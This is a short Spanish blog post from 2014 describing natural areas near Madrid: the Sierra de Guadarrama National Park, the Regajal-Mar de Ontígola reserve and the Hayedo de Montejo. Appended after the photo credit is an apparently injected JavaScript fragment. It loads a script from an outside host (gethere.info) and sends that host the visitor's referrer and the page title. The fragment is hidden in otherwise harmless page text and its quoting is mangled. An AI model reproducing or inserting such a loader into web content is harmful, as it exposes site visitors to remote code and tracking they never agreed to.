Valores naturales en Madrid

03/11/2014

Hayedo de Montejo

El Parque Nacional de la Sierra de Guadarrama es uno de esos espacios naturales que valen oro. Escondido en buena parte en la Comunidad de Madrid, sus casi 34.000 hectáreas forman parte de esa larga cadena montañosa llamada Sistema Central -de 500 kilómetros de longitud, ¡casi nada!- que atraviesa de este a oeste el centro de la Península Ibérica. Sus extraordinarias condiciones convierten a esta serie de montañas en el refugio perfecto para la biodiversidad de la zona.

Es evidente que su clima, más fresco y húmedo que el de la meseta, y su menor transformación por el hombre, aportan las claves para que el valor natural de esta zona sea incalculable. Su fauna y  flora de primera, unidas a elementos naturales atlánticos y mediterráneos, le aportan una personalidad única y diferente: roquedos graníticos, infinitos pinares (de pino albar), circos y lagunas glaciares…, ¡menudo espectáculo natural nos encontramos aquí! Por si esto fuera poco,  la zona y alrededores se complementan con la integración de unos 15 municipios con sus correspondientes espacios monumentales: el monasterio de El Escorial, el castillo de Manzanares El Real o el Monasterio de El Paular. Tal vez estos tres sean los ejemplos más representativos.

Sin embargo, ojo con pensar que el Parque de Guadarrama reina en exclusividad por aquí. Veamos otros dos ejemplos ecológicos igual de valiosos en la zona:

  • La reserva natural el Regajal-Mar de Ontígola. Esta reserva está localizada cerca de Aranjuez y cuenta con los Humedales del mar de Ontígola, por un lado, y  el Regajal, por otro lado. Mientras que los Humedales refugian avifauna acuática, el Regajal destaca por su botánica y estudio entomológico.
  • El Hayedo de Montejo.  250 hectáreas de bosque que adornan las faldas de la Sierra de Ayllón. Su grandísima importancia natural hace que sea tratado con un ciudado muy exclusivo. Así, para poder visitarlo, es necesario solicitar un permiso especial.

Foto |  David Gils.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;